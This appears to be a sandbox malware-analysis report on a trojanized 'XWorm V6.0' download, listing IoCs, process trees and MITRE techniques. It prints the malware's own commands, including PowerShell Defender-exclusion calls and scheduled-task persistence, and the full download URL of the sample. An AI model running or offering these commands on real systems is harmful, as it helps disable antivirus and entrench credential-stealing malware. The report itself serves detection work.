asyncrat | hxxps://github[.]com/HexShifter0/Xworm-V6[.]0/releases/download/BugFix%2BNewFeature/XWorm[.]V6[.]0[.]zip

pid	Process
560	chrome.exe
1660	chrome.exe
380	chrome.exe
5320	chrome.exe
5936	msedge.exe
5556	msedge.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

persistence privilege_escalation

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Control Panel\International\Geo\Nation	OneDrive.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Control Panel\International\Geo\Nation	Chrome Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Control Panel\International\Geo\Nation	update.dotnet.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Control Panel\International\Geo\Nation	XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Control Panel\International\Geo\Nation	XWorm V6.0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Control Panel\International\Geo\Nation	msedge.exe

Drops startup file 8 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Chrome Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Chrome Update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe

Executes dropped EXE 15 IoCs

pid	Process
1408	XWorm V6.0.exe
252	Chrome Update.exe
2272	OneDrive.exe
3356	msedge.exe
4328	Xworm V5.6.exe
1760	update.dotnet.exe
1408	svchost.exe
2824	svchost.exe
5728	svchost.exe
5372	svchost.exe
5200	svchost.exe
2344	msedge.exe
4564	OneDrive.exe
5880	XClient.exe
5716	OneDrive.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	update.dotnet.exe
Key opened	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	update.dotnet.exe
Key opened	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	update.dotnet.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	Chrome Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	XClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
135	pastebin.com
136	pastebin.com
178	pastebin.com
66	pastebin.com
110	pastebin.com
139	pastebin.com
188	pastebin.com
176	pastebin.com
144	pastebin.com
154	pastebin.com
168	pastebin.com
172	pastebin.com
173	pastebin.com
174	pastebin.com
67	pastebin.com
127	pastebin.com
152	pastebin.com
164	pastebin.com
190	pastebin.com
138	pastebin.com
143	pastebin.com
166	pastebin.com
169	pastebin.com
170	pastebin.com
187	pastebin.com
151	pastebin.com
163	pastebin.com
181	pastebin.com
183	pastebin.com
189	pastebin.com
175	pastebin.com
71	pastebin.com
74	pastebin.com
86	pastebin.com
141	pastebin.com
155	pastebin.com
167	pastebin.com
63	pastebin.com
68	pastebin.com
131	pastebin.com
157	pastebin.com
62	pastebin.com
147	pastebin.com
171	pastebin.com
179	pastebin.com
185	pastebin.com
186	pastebin.com
129	pastebin.com
150	pastebin.com
192	pastebin.com
73	pastebin.com
117	pastebin.com
137	pastebin.com
149	pastebin.com
161	pastebin.com
180	pastebin.com
133	pastebin.com
184	pastebin.com
165	pastebin.com
177	pastebin.com
60	raw.githubusercontent.com
61	raw.githubusercontent.com
104	pastebin.com
134	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
82	icanhazip.com

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4248	cmd.exe
4392	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	update.dotnet.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	update.dotnet.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1588	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5968	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133810659602168941"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000_Classes\Local Settings	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5872	schtasks.exe
3044	schtasks.exe
2832	schtasks.exe
3312	schtasks.exe
6096	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
820	chrome.exe
820	chrome.exe
4528	powershell.exe
4528	powershell.exe
4792	powershell.exe
4792	powershell.exe
4792	powershell.exe
4528	powershell.exe
1496	powershell.exe
1496	powershell.exe
4692	powershell.exe
4692	powershell.exe
1496	powershell.exe
4692	powershell.exe
1588	powershell.exe
1588	powershell.exe
1588	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
2464	powershell.exe
2464	powershell.exe
2464	powershell.exe
4684	powershell.exe
4684	powershell.exe
4684	powershell.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
1760	update.dotnet.exe
560	chrome.exe
560	chrome.exe
560	chrome.exe
1760	update.dotnet.exe
5288	msedge.exe
5288	msedge.exe
5612	powershell.exe
5612	powershell.exe
5612	powershell.exe
5828	powershell.exe
5828	powershell.exe
5828	powershell.exe
5284	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
672	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
820	chrome.exe
820	chrome.exe
560	chrome.exe
560	chrome.exe
560	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeShutdownPrivilege	820	chrome.exe
Token: SeCreatePagefilePrivilege	820	chrome.exe
Token: SeRestorePrivilege	2460	7zG.exe
Token: 35	2460	7zG.exe
Token: SeSecurityPrivilege	2460	7zG.exe
Token: SeSecurityPrivilege	2460	7zG.exe
Token: SeDebugPrivilege	252	Chrome Update.exe
Token: SeDebugPrivilege	2272	OneDrive.exe
Token: SeDebugPrivilege	3356	msedge.exe
Token: SeDebugPrivilege	1760	update.dotnet.exe
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	4792	powershell.exe
Token: SeIncreaseQuotaPrivilege	4792	powershell.exe
Token: SeSecurityPrivilege	4792	powershell.exe
Token: SeTakeOwnershipPrivilege	4792	powershell.exe
Token: SeLoadDriverPrivilege	4792	powershell.exe
Token: SeSystemProfilePrivilege	4792	powershell.exe
Token: SeSystemtimePrivilege	4792	powershell.exe
Token: SeProfSingleProcessPrivilege	4792	powershell.exe
Token: SeIncBasePriorityPrivilege	4792	powershell.exe
Token: SeCreatePagefilePrivilege	4792	powershell.exe
Token: SeBackupPrivilege	4792	powershell.exe
Token: SeRestorePrivilege	4792	powershell.exe
Token: SeShutdownPrivilege	4792	powershell.exe
Token: SeDebugPrivilege	4792	powershell.exe
Token: SeSystemEnvironmentPrivilege	4792	powershell.exe
Token: SeRemoteShutdownPrivilege	4792	powershell.exe
Token: SeUndockPrivilege	4792	powershell.exe
Token: SeManageVolumePrivilege	4792	powershell.exe
Token: 33	4792	powershell.exe
Token: 34	4792	powershell.exe
Token: 35	4792	powershell.exe
Token: 36	4792	powershell.exe
Token: SeIncreaseQuotaPrivilege	4528	powershell.exe
Token: SeSecurityPrivilege	4528	powershell.exe
Token: SeTakeOwnershipPrivilege	4528	powershell.exe
Token: SeLoadDriverPrivilege	4528	powershell.exe
Token: SeSystemProfilePrivilege	4528	powershell.exe
Token: SeSystemtimePrivilege	4528	powershell.exe
Token: SeProfSingleProcessPrivilege	4528	powershell.exe
Token: SeIncBasePriorityPrivilege	4528	powershell.exe
Token: SeCreatePagefilePrivilege	4528	powershell.exe
Token: SeBackupPrivilege	4528	powershell.exe
Token: SeRestorePrivilege	4528	powershell.exe
Token: SeShutdownPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	4528	powershell.exe

Suspicious use of FindShellTrayWindow 45 IoCs

pid	Process
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
2460	7zG.exe
560	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe
820	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 820 wrote to memory of 4428	820	chrome.exe	82
PID 820 wrote to memory of 4428	820	chrome.exe	82
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 4016	820	chrome.exe	83
PID 820 wrote to memory of 1560	820	chrome.exe	84
PID 820 wrote to memory of 1560	820	chrome.exe	84
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85
PID 820 wrote to memory of 3732	820	chrome.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	update.dotnet.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2934520114-3201407646-466687995-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	update.dotnet.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/HexShifter0/Xworm-V6.0/releases/download/BugFix%2BNewFeature/XWorm.V6.0.zip
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff97684cc40,0x7ff97684cc4c,0x7ff97684cc58
  2⤵
  PID:4428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1880,i,15640341589081785475,8726157985749600307,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=1840 /prefetch:2
  2⤵
  PID:4016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,15640341589081785475,8726157985749600307,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2132 /prefetch:3
  2⤵
  PID:1560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,15640341589081785475,8726157985749600307,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2272 /prefetch:8
  2⤵
  PID:3732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,15640341589081785475,8726157985749600307,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,15640341589081785475,8726157985749600307,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  PID:4680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,15640341589081785475,8726157985749600307,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4964 /prefetch:8
  2⤵
  PID:3772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4032,i,15640341589081785475,8726157985749600307,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3708 /prefetch:8
  2⤵
  PID:3552

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2812

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2124

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\XWorm.V6.0\" -spe -an -ai#7zMap29819:78:7zEvent22624
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2460

C:\Users\Admin\Desktop\XWorm.V6.0\XWorm V6.0.exe
"C:\Users\Admin\Desktop\XWorm.V6.0\XWorm V6.0.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:1408
- C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
  "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  PID:252
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3044
- C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
  "C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4684
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3312
- C:\Users\Admin\AppData\Local\Temp\msedge.exe
  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
